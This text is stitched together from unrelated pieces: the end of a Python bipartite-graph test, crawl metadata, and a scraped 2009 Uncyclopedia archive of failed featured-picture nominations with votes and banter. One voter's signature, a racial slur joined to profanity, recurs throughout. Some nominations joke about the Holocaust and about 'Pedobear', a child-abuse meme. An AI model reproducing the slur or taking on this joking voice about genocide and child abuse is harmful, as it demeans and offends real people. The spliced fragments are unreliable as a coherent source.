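print(is_bipartite(K2))              # True  (K2 is bipartite)
print(is_bipartite(cycle_graph(6)))  # True  (even cycle)
print(is_bipartite(cycle_graph(5)))  # False (odd cycle)
```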
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8598310947418213, "perplexity": 11867.095414985068}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499946.80/warc/CC-MAIN-20230201144459-20230201174459-00327.warc.gz"}
http://uncyclopedia.wikia.com/wiki/Uncyclopedia:VFP/Failed/archive14
Uncyclopedia:VFP/Failed/archive14 Bob the Sperm (history, logs) Featured picture candidate Bob was much more determined than the average sperm. Image credit: CheddarBBQ Archive - Discuss this image Vote Score: 0 Nomination: 02:20,22May,2009 02:20, 22 May 2009 (UTC) For Votes: 2 I like it more than my other crap. 02:20,22May,2009 For. --Docile hippopotamus 06:55, 22 May 2009 (UTC) Against Votes: 2 against=#Looks nothing like my sperm. $'''Shitaku Shits on you'''$ 02:20,22May,2009 Against.. Sorry my cheesy friend. Per Nachlader, I don't think this pic qualifies. -- 12:19, 22 May 2009 (UTC) Comments Far too unoriginal for my liking. The "sperm" is actually a depiction of a worm (same rhyme though) found on the cover of the brilliant 1997 vidjagame Worms 2. The fact that the only thing that's been done here is to nick that image and plant it on a background, which always makes images look less unoriginal, shows that there is absolutely nothing new about this. Also, it's a bloody worm. That and that I'd vote against anyway, I find nothing funny about this image or the article is originates from. ---kun "whisper sweet nothings into thine ear..." 10:49, 22 May 2009 (UTC) It's actually Worms: Armageddon. Much better than Worms 2. 71.207.14.13 Same dude, but looks slightly different. To me, the Worms 2 model is the same used in the nominated image. ---kun "whisper sweet nothings into thine ear..." 21:09, 22 May 2009 (UTC) Whichever game it's from, it's ineligible, so I'm aiming a super sheep launcher at this one. --UU - natter 13:52, May 22 Cat lol guitar.jpg (history, logs) Featured picture candidate Self-explaination Image credit: Iwillkillyou333 Archive - Discuss this image Vote Score: 0 Kitars Nomination: —Flutter (Talk•Games•Fun Pages•Awards•Help) 16:47, 16 May 2009 (UTC) For Votes: 4 Nom+For—Flutter (Talk•Games•Fun Pages•Awards•Help) 16:47, 16 May 2009 (UTC) For. Nice work. -OptyC Sucks! CUN16:49, 16 May For per above. --Mnb'z 03:46, 17 May 2009 (UTC) For Oh my word, that's awesome! --Pootah 22:15, 18 May 2009 (UTC) Against Votes: 4 Hell No! A picture of a cat? C'mon. 22:07,16May,2009 Tonight on Animals do the Funniest Things! Another picture of a kitten that's been made humourfied. ---kun "whisper sweet nothings into thine ear..." 23:31, 16 May 2009 (UTC) It's a cat. Holding a guitar. - T.L.B. WotM, UotM, FPrize, AotM, ANotM, PLS, UN:HS, GUN 07:26, May 17 Headband = No fucking way. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 13:12, 17 May 2009 (UTC) Comments Cute. Too cute to vote against. 22:09, 16 May 2009 (UTC) Torn. For, because it's a great 'chop? Against, because the joke is weak? I can't deal with all this pressure! -- User:KneeChee27/sig 18:47, 17 May 2009 (UTC) I'll vote for if someone brings me that kitten. I want it! -- 16:29, 18 May 2009 (UTC) Not even remotely original. Ineligible. --UU - natter 10:10, May 19 Clipdude.PNG (history, logs) Featured picture candidate lololololololololol Image credit: The UnIdiot Archive - Discuss this image Vote Score: 5 Things I'd Like To Do Nomination: - UnIdiot | | Talk | Contribs - 17:11, Mar 11 For Votes: 19 SNF - I could be doing Spanish, or I could be nominating dumb images I find hilarious in the most juvenile ways. - UnIdiot | | Talk | Contribs - 17:11, Mar 11 LOL -Sockpuppet of an unregistered user 17:14, 11 March 2009 (UTC) FORE. Spanish class is way overrated, anyways. - P.M., WotM, & GUN, Sir Led Balloon (Tick Tock) (Contribs) 17:23, 11 March 2009 (UTC) UR MUM. Never gets old. -OptyC Sucks! CUN20:12, 11 Mar Cheap punchline. 
/shakes fist. • • • 03:09, Mar 12 For. --Docile hippopotamus 04:46, 13 March 2009 (UTC) For. I laugh, I vote... MrN  Fork you! 03:55, Mar 14 Hahas For. Sorry put in the wrong place b4.-Smokin' Cheddar BBQ: The King of the Triangular Snackfoods 03:08, 14 March 2009 (UTC) I always wanted to kill that clip—Flutter (Talk•Games•Fun Pages•Awards•Help) 19:54, 15 March 2009 (UTC) For the Fucking Win. Colin ALL YOUR BASEHeaney! Casa Bey Superfly Portfolio 05:18, 17 March 2009 (UTC) VERY Weak Foar, Only because it made me laugh, not very well done Rbpolsen♦☺ 01:02, 21 March 2009 (UTC) For Very immature. Very immature. --MegaPleb • Dexter111344 • Complain here 20:12, 23 March 2009 (UTC) For For For For For For For --- Ironfist Talk to me 02:40, 24 March 2009 (UTC) Reluctant For Per MrN9000. -- 02:49, 26 March 2009 (UTC) Weak for. Seen this many times but I don't get it. 14:22, 26 March 2009 (UTC) Hilarious. And that's what matters. -- T​K​F​​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​U​CK 02:10, 27 March 2009 (UTC) Weak for. Shoot me. I'm immature. Parsat (talk / contribs) 05:00, 3 April 2009 (UTC) lol Woody On Fire! Talking Woody Stalking Woody 20:31, 15 April 2009 (UTC) Rofltastic! I giggled like a little schoolgirl and do not know why. --CopperCore(Talk)(Contribs) 19:00, 17 April 2009 (UTC) This picture is epic win, and everyone who voted against is a soulless waste of wikispace. Who cares about effort? This is genius with a capital j. – Sir Skullthumper, MD (criticize • writings • SU&W) 19:36 Apr 22, 2009 Against Votes: 14 UR MUM. Not my cup of tea. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 20:28, 11 March 2009 (UTC) Against. lolurmomjoak. Also, text-based and cheap as chips. No. --UU - natter 11:46, Mar 12 Against For the simple fact that I don't think this really counts as "manipulating an image." - 13:41, 16 March 2009 (UTC) Dude, cropping an image in MS Paint is totally manipulation... - UnIdiot | | Talk | Contribs - 02:35, Mar 17 Against. text based. --Mnb'z 14:43, 17 March 2009 (UTC) Against. Lolno. As the answer to a "what" question a "who" is, frankly, ridiculous. 05:35, 18 March 2009 (UTC) against. not quite. SirGerrycheeversGunTalk 14:43, 18 March 2009 (UTC) against. Funny but not feature worthy -- 17:48, 19 March 2009 (UTC) Against. Per Under user. Also blurry and poorly done.--123 •T•C•E 19:58, 25 March 2009 (UTC) It looks blurry because it's blown up on VFP. The actual file isn't blurry. -- 02:49, 26 March 2009 (UTC) The actual file may not be blurry, but it still be blown up on the front page. It doesn't have to be. (Fixed.) --Algorithm 05:01, 3 April 2009 (UTC) Yawn A shitty screenshot of a ya mom joke. -- 10:39, 30 March 2009 (UTC) vote change. Feel free to hate, but I don't care. It's cheap. • • • 15:32, Mar 31 Against.- Ditching spanish class means we will never liberate Cuba. Please think of the poor, dying cubains and not vote for this crappy image. Sir Not A Good Username360 KUN 23:26, 10 April 2009 (UTC) against Djdorama 16:08, 11 April 2009 (UTC) YES! Sir Cs1987 UOTM. t. c 14:08, 25 April 2009 (UTC) Na. ~ 11:43, 27 April 2009 (UTC) Comments Abstain. It might be the influx of poor text-based, Microsoft-related images that came before this, but this image made me laugh. However, I'm still torn. ---kun "whisper sweet nothings into thine ear..." 22:47, 11 March 2009 (UTC) Cheddar my man, your edit confuses me... - T.L.B. 
WotM, UotM, FPrize, AotM, ANotM, PLS, UN:HS, GUN 03:50, Mar 14 I think I remember seeing that he accidently posted his vote at the top, stealing whatever credit the nominator gained by being the first voter. ---kun "whisper sweet nothings into thine ear..." 00:34, 15 March 2009 (UTC) To everyone who says the quality is poor, I don't think you realized this is a direct screenshot... - UnIdiot | | Talk | Contribs - 20:02, Mar 25 rm, +5 after near 2 months - 04:03, 2 May 2009 (UTC) Wildecoin.jpg (history, logs) Featured picture candidate In Sophia we trust. Image credit: Sonje Archive - Discuss this image Vote Score: 1 Sophians Nomination: 14:22, 4 April 2009 (UTC) For Votes: 8 Nom+4 Sonje. Never fails :) 14:22, 4 April 2009 (UTC) 4. Sir Not A Good Username360 KUN 22:42, 4 April 2009 (UTC) I like it enough to vote For. —Socky (stalk) 10:17, 5 April 2009 (UTC) For.--123 •T•C•E 15:39, 5 April 2009 (UTC) For. Just for the kicks.—Flutter (Talk•Games•Fun Pages•Awards•Help) 20:10, 12 April 2009 (UTC) For. I love it! --CopperCore(Talk)(Contribs) 18:50, 17 April 2009 (UTC) For. --Docile hippopotamus 14:22, 23 April 2009 (UTC) For Oscar Wilde --Mnb'z 03:32, 2 May 2009 (UTC) Against Votes: 7 self against. I made this when I first joined Uncyclopedia, was just messing around, I don't think it's feature worthy. -- 20:41, 4 April 2009 (UTC) Against. Well done and all, but Wilde on a coin - how is this funny? --UU - natter 11:27, Apr 6 Against. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 15:57, 6 April 2009 (UTC) against. not bad, but not VFP material. SirGerrycheeversGunTalk 18:40, 8 April 2009 (UTC) against Djdorama 16:24, 11 April 2009 (UTC) Against, as per UU. • • • 18:38, Apr 13 Against I don't think Zombiebaron will be voting so I have to be the critic in his place: The text doesn't match (also, text-based), and Wilde's face doesn't look metallic like a coin would. -- 01:14, 14 April 2009 (UTC) Comments 1 month, 1 score. Fail'd. 03:13, 4 May 2009 (UTC) Microchip1 (history, logs) Featured picture candidate No wonder computers need over 100gb of storage space. Image credit: Mhaille Archive - Discuss this image Vote Score: 0 microchippies Nomination: 14:44, 4 April 2009 (UTC) For Votes: 8 Nom+4 Yay! 14:44, 4 April 2009 (UTC) Can't argue with the classics. —The preceding unsigned comment was added by Not A Good Username360 (talk • contribs) diff For and I have no idea why. —Socky (stalk) 10:20, 5 April 2009 (UTC) Yeah, cool. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 15:56, 6 April 2009 (UTC) For I prefer the ATI Dorito chip myself. Intel's stuff just doesn't have any flavor. And what's with those ridges?! - 18:54, 7 April 2009 (UTC) For. -- 16:48, 8 April 2009 (UTC) For Djdorama 16:05, 11 April 2009 (UTC) OM NOM NOM! MMM, Yummy microchip goodness! --CopperCore(Talk)(Contribs) 19:03, 17 April 2009 (UTC) Against Votes: 8 Against. It's a bit funny, but not really anything special--Smokin' Cheddar BBQ: The King of the Triangular Snackfoods 20:18, 8 April 2009 (UTC) Richard3 21:19, 9 April 2009 (UTC) I concur, its a bit dull, good idea but doesn't deliver. Nah If it had been a microchip in the shape of a potato chip it would have been funnier. This is just a chip stuck on. -- 07:57, 12 April 2009 (UTC) Against. Per DJ, I think - it's a potato chip stuck on a microchip. Not really all that funny to me. --UU - natter 17:45, Apr 12 Against. ---kun "whisper sweet nothings into thine ear..." 14:11, 14 April 2009 (UTC) Against as per UU. • • • 16:29, Apr 16 Against I didn't find it funny. 
Woody On Fire! Talking Woody Stalking Woody 15:38, 29 April 2009 (UTC) Againt per above. --Mnb'z 03:34, 2 May 2009 (UTC) Comments 1 month, 0 score. Fail'd. 03:13, 4 May 2009 (UTC) "Penetrate" image title here, without link (history, logs) Featured picture candidate Sometimes in life you will find that the world turns into Jar Jar Binks and then God takes Sauron into space while an alien watches through the window approvingly. Image credit: Sliferjam Archive - Discuss this image Vote Score: -3 images that are totally better than the image below it Nomination: Syndrome For Votes: 1 Haha wut -- 21:07, 5 May 2009 (UTC) Against Votes: 4 No per Jar Jar Binks. 21:12, 5 May 2009 (UTC) Against per Lord Sauron's vagEYEna. ---kun "whisper sweet nothings into thine ear..." 21:39, 5 May 2009 (UTC) Against. Perhaps my crack dosage just wasn't high enough today but I don't get it. -- 21:50, 5 May 2009 (UTC) Against. lolwut, etc. 02:47, 6 May 2009 (UTC) Comments -3, fail'd. 02:47, 6 May 2009 (UTC) Holocaust Tycoon 2 (history, logs) Featured picture candidate Do you have what it takes to mastermind the Master Race? Image credit: Heino Archive - Discuss this image Vote Score: -3 jewrides Nomination: CrabPope For Votes: 1 Nom and for It's so wrong, but I love it. —The preceding unsigned comment was added by CrabPope (talk • contribs) Against Votes: 4 Against Not really funny outside the article. -- 23:40, 5 May 2009 (UTC) Against Maybe if it was more Holocausty. Right now the word is switched, but its just a theme park behind. Nothing really funny about that. Woody On Fire! Talking Woody Stalking Woody 23:53, 5 May 2009 (UTC) Needs more Auschwitz. • • • 01:16, May 6 Against. As above. 02:56, 6 May 2009 (UTC) Comments -3, fail'd. 02:57, 6 May 2009 (UTC) WikiEaster (history, logs) Featured picture candidate Of course, Uncyclopedia's logo is a copy of Uncyclopedia's Easter Logo. Image credit: Tompkins Archive - Discuss this image Vote Score: -5 Easter Bunnies! Nomination: 06:17, 9 May 2009 (UTC) For Votes: 1 An ankh smiles upon thou. 06:17, 9 May 2009 (UTC) Against Votes: 6 Not really funny. Woody On Fire! Talking Woody Stalking Woody 06:47, 9 May 2009 (UTC) Against. Er, no. --UU - natter 08:37, May 9 AGH THE COLORS! 08:59, 9 May 2009 (UTC) AHAHAAHAAH I SHIT MY PANTS ---kun "whisper sweet nothings into thine ear..." 09:59, 9 May 2009 (UTC) ... ...Really? -OptyC Sucks! CUN15:26, 9 May Girl, you really got me goin'.... -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 16:59, 9 May 2009 (UTC) Comments -5, fail'd. 18:47, 9 May 2009 (UTC) Daeh-gnidolpxE (history, logs) Featured picture candidate Image credit: ErrickFoxy Archive - Discuss this image Vote Score: -3 people with SEHS Nomination: 11:07, 9 May 2009 (UTC) For Votes: 1 Bless + 4 Isn't this life? 11:07, 9 May 2009 (UTC) Against Votes: 4 Disgusting either way. 11:09, 9 May 2009 (UTC) Running it backwards makes it new again! Nah. -OptyC Sucks! CUN15:24, 9 May This ever going to stop? ---kun "whisper sweet nothings into thine ear..." 16:27, 9 May 2009 (UTC) HOLY SHIT, REMEMBER WHEN THAT GUY'S HEAD IN SCANNERS BLEW UP.........BACKWARDS?!?!?! -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 16:50, 9 May 2009 (UTC) Comments -3, fail'd. 18:47, 9 May 2009 (UTC) "Deer (history, logs) Featured picture candidate A" dear in it's natural Habitat. Image credit: Hairy Midget Archive - Discuss this image Vote Score: -4 Hairy deers Nomination: 11:55, 10 May 2009 (UTC) For Votes: 3 Ra smiles upon thou. 
11:55, 10 May 2009 (UTC) HAHAHAHAHAHA But you really do need to stop doing this, seriously, what's wrong with you? (i fuckin' love this one though, honestly) -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 15:30, 10 May 2009 (UTC) Point taken. *scribbles furiously on notebook* 08:13, 11 May 2009 (UTC) For. --Docile hippopotamus 16:14, 10 May 2009 (UTC) Against Votes: 7 Against. Please stop nominating images like these. ---kun "whisper sweet nothings into thine ear..." 15:14, 10 May 2009 (UTC) Against. As per Nachlader. 15:26, 10 May 2009 (UTC) +1 Fathers of Bambi (talk) 20:38, 10 May 2009 (UTC) Nah Woody On Fire! Talking Woody Stalking Woody 05:27, 11 May 2009 (UTC) Hilarious -- 07:24, 11 May 2009 (UTC) Against. Oh dear. --UU - natter 09:15, May 11 Against. I'm calling PETA -- 10:08, 11 May 2009 (UTC) Comments I fixed the caption. -- 18:05, 10 May 2009 (UTC) -4, fail'd. 14:58, 11 May 2009 (UTC) "Voodoo" Cheddar (history, logs) Featured picture candidate Time to put an end to all whoring once and for all... Image credit: Sonje Archive - Discuss this image Vote Score: -5 Dead Cheddars Nomination: ~SirTagstit • VFH • NotM • PEEING • CPT • RotM • BFF 02:52, 11 May 2009 (UTC) For Votes: 2 #I don't think this will pass, but I found it funny enough to give it a shot. And...and...its Sonje work. ~SirTagstit • VFH • NotM • PEEING • CPT • RotM • BFF 02:52, 11 May 2009 (UTC) Ow WTF? That hurt. But it is funny.-- 02:58,11May,2009 For. It's a Sonje pic, auto for (talk) 05:01, 11 May 2009 (UTC) Against Votes: 7 Against. I've moved on. You should too. Also, vanity, and not the good kind of vanity, where it's a picture of me being sexy. 03:11, 11 May 2009(UTC) Oh this is by no means an attack on him. I like Cheddar, I just thought this was funny. ~SirTagstit • VFH • NotM • PEEING • CPT • RotM • BFF 03:20, 11 May 2009 (UTC) I made this in retaliation to Cheddar having the audacity to put me on his list of followers, it actually had nothing to do with the whoring event. PS: Modus, your sexiness cannot be captured on film. But not because it would crack the lense or anything...-- 03:34, 11 May 2009 (UTC) The pictures turn out best if you leave the lens cap on. It leaves more to the imagination. The sexy, sexy imagination. 04:24, 11 May 2009 (UTC) Yeah, that Cheddar is pretty audacious. Also, Against. -- 06:55, 11 May 2009 (UTC) Injoke, vanity, unfunny. Look people, Uncyclopedia is not your bitch, other people read it. Other people who don't care about you. None of them would get this. They do get this however. -- 07:09, 11 May 2009 (UTC) OMG! That is so funny! How did you find that? -- 10:43, 11 May 2009 (UTC) Chill. It was meant as an in-joke, never intended for featuring. Dammit! Now I have to get revenge on Syndrome too! What does a Syndrome look like? -- 09:08, 11 May 2009 (UTC) In the words of Madonna, like a virgin. ---kun "whisper sweet nothings into thine ear..." 10:20, 11 May 2009 (UTC) Against. Whenever the author votes against. But also the fact that it's really not funny. ---kun "whisper sweet nothings into thine ear..." 10:20, 11 May 2009 (UTC) Against Just to get it off   16:01, 11 May 2009 (UTC) No! No! No! Down with the drama! 16:10, 11 May 2009 (UTC) It had nothing to do with the drama, it is a completely different separate thing altogether. Cheddar and I were having a discussion on my talk page. Tagstit found it funny and nommed it. It is just a joke, no personal attack, ask Cheddar if you want or check my talk page. Shall we move on. 
-- 16:15, 11 May 2009 (UTC) I know that, but it sounded like an appropriate thing to say. 16:19, 11 May 2009 (UTC) Comments Ya sorry maybe I took it a bit too far but it was meant more as an injoke than a personal attack. ~SirTagstit • VFH • NotM • PEEING • CPT • RotM • BFF 13:58, 11 May 2009 (UTC) To be clear, this has nothing to do with the Whore Dramathon, completely unrelated. This was all in good fun.-- 19:19,11May,2009 -5, fail'd. 20:19, 11 May 2009 (UTC) Grand "Theft" Mario (history, logs) Featured picture candidate When Mario was investigated by the DEA for dealing mushrooms, the PR geniuses at Nintendo used the hype to make a spin-off video game. Image credit: Tunel Archive - Discuss this image Vote Score: -3 people who want to corrupt our youth Nomination: For Votes: 3 Nom and whatever It's okay. I mean, I kind of like it, I guess. -- 00:51, 12 May 2009 (UTC) For per above. --Mnb'z 05:49, 12 May 2009 (UTC) I know The GTA thing has been done, but I think this one is done better than most. Just because there is a few somewhat like it, doesn't mean NONE can be featured. If I guy writes an article, then another writes a new one using the same style, does that mean BOTH lose? 18:38,12May,2009 Against Votes: 6 Against. It's not at all badly done, what with the images that have been turned into the recognisable panels of a GTA cover, but this kind of image has been done multiple times before and I fail to see why Mario makes it any funnier. ---kun "whisper sweet nothings into thine ear..." 10:24, 12 May 2009 (UTC) Against as per Nachlader. • • • 15:03, May 12 Against. Oh boy, another GTA cover with a different character used. I think it's the originality I love about this the most. --UU - natter 15:08, May 12 Yeah, boring, whatever. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 20:06, 12 May 2009 (UTC) Against Nothing to see here. Nicely done, but the joke is tired. --Asahatter (annoy) 22:01, 12 May 2009 (UTC) Abstain needs more weaponry, cars, and semi-nude women (Peach, Daisy etc), only then will the incongruity of the two worlds be fully realised, by my reckoning --CrabPope 21:14, 12 May 2009 (UTC) Comments -3, fail'd. 01:55, 13 May 2009 (UTC) "SoIwastolazytolearnGermanic (history, logs) Featured picture candidate Archive - Discuss this image Vote Score: -3 cute Nachlader sigs Nomination: 09:49, 13 May 2009 (UTC) For Votes: 1 Nachlader. Certainly a piece of magnificent art, wonderfully crafted. 09:49, 13 May 2009 (UTC) Against Votes: 4 No, seriously. ~ 09:54, 13 May 2009 (UTC) Against.. Featured pictures Zheliel not featured sigs. -- 09:59, 13 May 2009 (UTC) Too much gray in the background. 10:04, 13 May 2009 (UTC) Fuckino -- 12:38, 13 May 2009 (UTC) Comments -3, vanity...I mean, fail'd. 13:21, 13 May 2009 (UTC) Uncyclopedia Bomb (history, logs) Featured picture candidate An Uncyclo-Bomb. Unfortunately, the maker forgot to cap the potato, so this will go to waste. Image credit: Sliferjam Archive - Discuss this image Vote Score: -3 *boom!* Nomination: 11:30, 13 May 2009 (UTC) For Votes: 2 Nom+4. Artistic :D 11:30, 13 May 2009 (UTC) Penis That's Why. 16:41,13May,2009 Against Votes: 5 Dude! Where do you find this stuff? -- 13:19, 13 May 2009 (UTC) Against. Insert desperate jacket potato related pun here. ---kun "whisper sweet nothings into thine ear..." 13:30, 13 May 2009 (UTC) KABOOM! 16:41, 13 May 2009 (UTC) Against ms painty. --Mnb'z 18:23, 13 May 2009 (UTC) Artistic. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 20:31, 13 May 2009 (UTC) Comments -3, fail'd. 
01:18, 14 May 2009 (UTC) "zombiebaron (history, logs) Featured picture candidate You can all thank Nachlader for this. Image credit: mtallmen_184 Archive - Discuss this image Vote Score: -4 zombiebarons Nomination: Mtallmen 184 20:58, 14 May 2009 (UTC) For Votes: 5 Nom+For--Mtallmen 184 20:58, 14 May 2009 (UTC) Fuck yes. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 21:27, 14 May 2009 (UTC) For I dont know what to criticize...the font?--Fuentfue 22:10, 14 May 2009 (UTC) For --Docile hippopotamus 22:16, 14 May 2009 (UTC) Zombiebaron - 23:57, 14 May 2009 (UTC) Invalid zombiebaron, double zombiebaron'ing. 00:25, 15 May 2009 (UTC) For could be a bit more text based though. --Mnb'z 05:14, 15 May 2009 (UTC) Against Votes: 9 Zombiebaron. 20:59, 14 May 2009 (UTC) Text base. ~ 22:13, 14 May 2009 (UTC) Against. I mean, zombiebaron. 23:46, 14 May 2009 (UTC) Zombiebaron - 23:57, 14 May 2009 (UTC) Invalid zombiebaron, double zombiebaron'ing. 00:25, 15 May 2009 (UTC) Zombiebaron zombiebaron zombiebaron? Zombiebaron zombiebaron. ZOMBIEBARON! ZOOOOMBIIIEEEEBAROOOON!!!....zombiebaron. - 00:32, 15 May 2009 (UTC) Exactly. 03:17, 15 May 2009 (UTC) Yeah. Text-based in-joke. No. • Spang • • 06:48, 15 May 2009 Against Not enough text, I think, could be wrong though. (talk) 06:54, 15 May 2009 (UTC) Hnnng. --UU - natter 08:27, May 15 Respect the undead -- 15:14, 15 May 2009 (UTC) AHAHAHAHA!!! • • • 15:48, May 15 I am voting to show that I am aware of the joke here and am therefore part of the "cool" crowd. I don't get it. -OptyC Sucks! CUN15:52, 15 May Comments Swine flu and now this. I give people the wrong ideas these days. ---kun "whisper sweet nothings into thine ear..." 22:34, 14 May 2009 (UTC) Zombiebaron - 23:57, 14 May 2009 (UTC) -4, fail'd. 20:55, 15 May 2009 (UTC) "Dog (history, logs) Featured picture candidate i" like this Image credit: TicklerLeon11 Archive - Discuss this image Vote Score: -0.5 Nomination: TicklerLeon11 17:55, 29 April 2009 (UTC)~ For Votes: 12.5 sn+f TicklerLeon11 17:55, 29 April 2009 (UTC)~ This is better than anything Da Vinci ever made. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 20:54, 29 April 2009 (UTC) Don't you mean Picasso? —Socky (stalk) 21:30, 29 April 2009 (UTC) Him too (and I see what you mean). -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 21:31, 29 April 2009 (UTC) For. I think it's rather risqué for a pre-Raphaelite period painting, but the romantic yet gothic themes are evident in how well the brush has been carefully defted in the facial features. T'were it a novel, it would've been written by Mary Shelley. I can imagine myself with some cheese, some 47' Pinot Noir and an evening of Dvorak whilst admiring this painting. ---kun "whisper sweet nothings into thine ear..." 21:32, 29 April 2009 (UTC) You convinced me. —Socky (stalk) 21:34, 29 April 2009 (UTC) Terrible. -OptyC Sucks! CUN21:37, 29 Apr For. Surprised people are voting for it. --Docile hippopotamus 22:06, 29 April 2009 (UTC) For. Nice change. Love this pic as well. 16:10, 30 April 2009 (UTC) For Made me laugh a little. Well, at least chuckle. Plus, it's definitely an original. --MegaPleb • Dexter111344 • Complain here 20:51, 30 April 2009 (UTC) This is better than Modern Art --Mtallmen 184 21:43, 1 May 2009 (UTC) For. It's artistic and humorous. --Codell 21:05, 6 May 2009 (UTC) Post-Mortemestic masterpiece. Go eat shit, picasso. Colour Sig For Make Mahm00shA Look Cool 23:57, 9 May '09 can i be serious? this is the only picture, scrolling through VFP, that has ever made me laugh. 
therefore, it gets a for vote. it's really such a strange brand of humour that doesn't actually make sense at all but it's funny. —The preceding unsigned comment was added by Djdorama (talk • contribs) diff GREAT This magnificent painting is far ahead of it's time!--168.8.212.135 14:52, 13 May 2009 (UTC) Against Votes: 13 Against. That dog ate my red baseball cap. Jerk. 00:42, 30 April 2009 (UTC) Buzzkill It has to be done. Voting for something like this is fine until the possibility of it's success becomes plausible. --Smokin' Cheddar BBQ: The King of the Triangular Snackfoods 01:35, 30 April 2009 (UTC) Like when you were on American Idol? 05:03, 30 April 2009 (UTC) Per Chedder so very per -- 10:34, 30 April 2009 (UTC) Too much quality. • • • 15:13, Apr 30 strong zombiebaron. SirGerrycheeversGunTalk 15:23, 30 April 2009 (UTC) Against. MSPaint.--123 •T•C•E 20:34, 30 April 2009 (UTC) Y'what? ---kun "whisper sweet nothings into thine ear..." 23:16, 30 April 2009 (UTC) NOOOOOOOOO! - I was once bitten by a dog. :-( OK, not really. Rbpolsen♦☺ 00:36, 1 May 2009 (UTC) Against CGMWTP reborn. --Mnb'z 03:35, 2 May 2009 (UTC) Against As per Cheddar & DJ. Also very very per. -- 12:44, 4 May 2009 (UTC) Down boy. --UU - natter 11:05, May 5 Obliterate. er...I mean Against. (talk) 22:52, 10 May 2009 (UTC) Against. Is the joke the fact that someone should think this worthy of feature? Some sanity called for - this isn't Fisher Price --Asahatter (annoy) 22:11, 12 May 2009 (UTC) O LOL. - T.L.B. WotM, UotM, FPrize, AotM, ANotM, PLS, UN:HS, GUN 07:24, May 17 Comments We should at the very least give some kind of award to the creator of this magnificent image. —Socky (stalk) 20:54, 30 April 2009 (UTC) A public hanging? This kind of painting is so 1848. We're in the POST-IMPRESSIONIST age now! Think of it - Henri Rousseau-powered vacuum cleaners, Paul Cézanne-inspired rockets to space, flying cars fueled by Émile Bernard! EVEN TRAINS GUIDED BY PAUL SIGNAC! Post-Impressionism is FUTURISM! ---kun "whisper sweet nothings into thine ear..." 23:21, 30 April 2009 (UTC) OI! LOOK OVER HERE YA'LL! We got a regular Art Major over 'ere. WE DON'T LIKE YER KIND, PAINTER BOY! Woody On Fire! Talking Woody Stalking Woody 23:38, 30 April 2009 (UTC) Yeah! We likes them classy paintins on the velvet. 02:54, 1 May 2009 (UTC) He looks just like my first dog Sam. I can't believe this is getting so many against votes. You jerks just hate dogs don't you? -OptyC Sucks! CUN22:37, 8 May 2 weeks, -0.5, fail'd. 19:19, 17 May 2009 (UTC) Pedobear 1 (history, logs) Featured picture candidate Pedobear likes what he sees. Image credit: mtallmen_184 Archive - Discuss this image Vote Score: -3 Pedobear seals of approval Nomination: Mtallmen 184 18:18, 17 May 2009 (UTC) For Votes: 1 nom and for--Mtallmen 184 18:18, 17 May 2009 (UTC) Against Votes: 4 Been there, done that. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 18:24, 17 May 2009 (UTC) Against. Old joke. Sloppy execution. -- User:KneeChee27/sig 18:35, 17 May 2009 (UTC) MObear says "No". 19:16, 17 May 2009 (UTC) Pass. Quickly please. --T. (talk) 23:03, 17 May 2009 (UTC) Comments -3, fail'd. 02:48, 18 May 2009 (UTC) A text based Image (history, logs) Featured picture candidate There is no such thing as a good text based image, as too much text ruins all images. Image credit: Fuentfue Archive - Discuss this image Vote Score: -3 Text based Images Nomination: Fuentfue 06:19, 13 May 2009 (UTC)fuentfue For Votes: 5 SN&F-fuent Bless.. Holy indeed. 09:39, 13 May 2009 (UTC) I like it. 
10:03, 13 May 2009 (UTC) For Italian Art. 21:08,13May,2009 For. --Docile hippopotamus 03:27, 14 May 2009 (UTC) Against Votes: 8 Next, we're going to have an image that simply reads "zombiebaron". ---kun "whisper sweet nothings into thine ear..." 09:23, 13 May 2009 (UTC) Against. -- 10:01, 13 May 2009 (UTC) Against. concept is funny, but execution could use some work. --Mnb'z 18:25, 13 May 2009 (UTC) Against. -- Hi, hey! I'M A MOTERFUCKING NIGGER BITCH LOVER 20:38, 13 May 2009 (UTC) 'Gainst as per Nach. • • • 02:56, May 14 Against We have the much better printer-based Mona Lisa, and this really didn't take much to create I'm sure. Also, not very funny. - 23:55, 14 May 2009 (UTC) Against. Made to make a point. But it's not funny, even as an illustration of said point. --UU - natter 08:26, May 15 per UU. - T.L.B. WotM, UotM, FPrize, AotM, ANotM, PLS, UN:HS, GUN 07:25, May 17 Comments -3, fail'd. 03:07, 19 May 2009 (UTC) "WWF" Press Conference (history, logs) Featured picture candidate The lion mouths off to the bear in front of the press. The gorilla imagines what they had for lunch. Image credit: Sonje Archive - Discuss this image Vote Score: 7 Wrestlers that are NOT on steroids. Nomination: Smokin' Cheddar 